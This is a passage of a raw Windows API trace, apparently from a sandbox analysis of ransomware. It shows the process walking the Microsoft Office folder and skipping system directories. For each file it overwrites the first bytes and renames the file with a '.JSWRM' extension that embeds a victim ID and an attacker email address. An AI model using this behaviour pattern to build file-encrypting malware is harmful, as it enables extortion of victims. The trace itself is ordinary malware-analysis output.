| out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b22ac67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbf4f0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7.dll", cAlternateFileName="")) returned 1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2=".") returned 1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="..") returned 1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="...") returned 1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="windows") returned -1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="recovery") returned -1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="perflogs") returned -1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="documents and settings") returned 1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="system volume information") returned -1 [0136.079] lstrcmpiW (lpString1="mset7.dll", lpString2="msocache") returned -1 [0136.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7.dll", lpUsedDefaultChar=0x0) returned 9 [0136.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7.dll", lpUsedDefaultChar=0x0) returned 9 [0136.079] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b27715c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c5000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7db.kic", cAlternateFileName="")) returned 1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2=".") returned 1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="..") returned 1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="...") returned 1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="windows") returned -1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="recovery") returned -1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="perflogs") returned -1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="documents and settings") returned 1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="$RECYCLE.BIN") returned 1 [0136.079] lstrcmpiW (lpString1="mset7db.kic", lpString2="system volume information") returned -1 [0136.080] lstrcmpiW (lpString1="mset7db.kic", lpString2="msocache") returned -1 [0136.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7db.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7db.kic", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7db.kic", lpUsedDefaultChar=0x0) returned 11 [0136.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7db.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7db.kic", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7db.kic", lpUsedDefaultChar=0x0) returned 11 [0136.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7db.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7db.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.081] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2904064) returned 1 [0136.081] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.082] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0136.103] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.103] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0136.104] CloseHandle (hObject=0x45c) returned 1 [0136.104] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7db.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7db.kic"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7db.kic.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7db.kic.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.105] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c5b3e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7en.kic", cAlternateFileName="")) returned 1 [0136.105] lstrcmpiW (lpString1="mset7en.kic", lpString2=".") returned 1 [0136.105] lstrcmpiW (lpString1="mset7en.kic", lpString2="..") returned 1 [0136.105] lstrcmpiW (lpString1="mset7en.kic", lpString2="...") returned 1 [0136.106] lstrcmpiW (lpString1="mset7en.kic", lpString2="windows") returned -1 [0136.106] lstrcmpiW (lpString1="mset7en.kic", lpString2="recovery") returned -1 [0136.106] lstrcmpiW (lpString1="mset7en.kic", lpString2="perflogs") returned -1 [0136.106] lstrcmpiW (lpString1="mset7en.kic", lpString2="documents and settings") returned 1 [0136.106] lstrcmpiW (lpString1="mset7en.kic", lpString2="$RECYCLE.BIN") returned 1 [0136.106] lstrcmpiW (lpString1="mset7en.kic", lpString2="system volume information") returned -1 [0136.106] lstrcmpiW (lpString1="mset7en.kic", lpString2="msocache") returned -1 [0136.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7en.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7en.kic", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7en.kic", lpUsedDefaultChar=0x0) returned 11 [0136.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7en.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7en.kic", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7en.kic", lpUsedDefaultChar=0x0) returned 11 [0136.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7en.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7en.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.107] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1858366) returned 1 [0136.107] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.107] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0136.120] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.120] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0136.121] CloseHandle (hObject=0x45c) returned 1 [0136.121] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7en.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7en.kic"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7en.kic.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7en.kic.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.122] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b27715c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e9f2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7es.kic", cAlternateFileName="")) returned 1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2=".") returned 1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="..") returned 1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="...") returned 1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="windows") returned -1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="recovery") returned -1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="perflogs") returned -1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="documents and settings") returned 1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="$RECYCLE.BIN") returned 1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="system volume information") returned -1 [0136.122] lstrcmpiW (lpString1="mset7es.kic", lpString2="msocache") returned -1 [0136.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7es.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7es.kic", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7es.kic", lpUsedDefaultChar=0x0) returned 11 [0136.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7es.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7es.kic", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7es.kic", lpUsedDefaultChar=0x0) returned 11 [0136.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7es.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7es.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.123] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1305074) returned 1 [0136.123] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.123] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0136.137] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.137] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0136.137] CloseHandle (hObject=0x45c) returned 1 [0136.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7es.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7es.kic"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7es.kic.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7es.kic.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.138] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b440d69, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c4c1c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7fr.kic", cAlternateFileName="")) returned 1 [0136.138] lstrcmpiW (lpString1="mset7fr.kic", lpString2=".") returned 1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="..") returned 1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="...") returned 1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="windows") returned -1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="recovery") returned -1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="perflogs") returned -1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="documents and settings") returned 1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="$RECYCLE.BIN") returned 1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="system volume information") returned -1 [0136.139] lstrcmpiW (lpString1="mset7fr.kic", lpString2="msocache") returned -1 [0136.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7fr.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7fr.kic", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7fr.kic", lpUsedDefaultChar=0x0) returned 11 [0136.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7fr.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7fr.kic", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7fr.kic", lpUsedDefaultChar=0x0) returned 11 [0136.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7fr.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7fr.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.140] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1854492) returned 1 [0136.140] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.140] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0136.158] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.158] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0136.159] CloseHandle (hObject=0x45c) returned 1 [0136.159] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7fr.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7fr.kic"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7fr.kic.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7fr.kic.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b335ccc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3567a6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mset7ge.kic", cAlternateFileName="")) returned 1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2=".") returned 1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="..") returned 1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="...") returned 1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="windows") returned -1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="recovery") returned -1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="perflogs") returned -1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="documents and settings") returned 1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="$RECYCLE.BIN") returned 1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="system volume information") returned -1 [0136.160] lstrcmpiW (lpString1="mset7ge.kic", lpString2="msocache") returned -1 [0136.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7ge.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7ge.kic", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7ge.kic", lpUsedDefaultChar=0x0) returned 11 [0136.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7ge.kic", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mset7ge.kic", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mset7ge.kic", lpUsedDefaultChar=0x0) returned 11 [0136.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7ge.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7ge.kic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.162] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3499942) returned 1 [0136.162] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.162] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0136.175] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.175] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0136.176] CloseHandle (hObject=0x45c) returned 1 [0136.176] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7ge.kic" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7ge.kic"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mset7ge.kic.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mset7ge.kic.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.177] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, 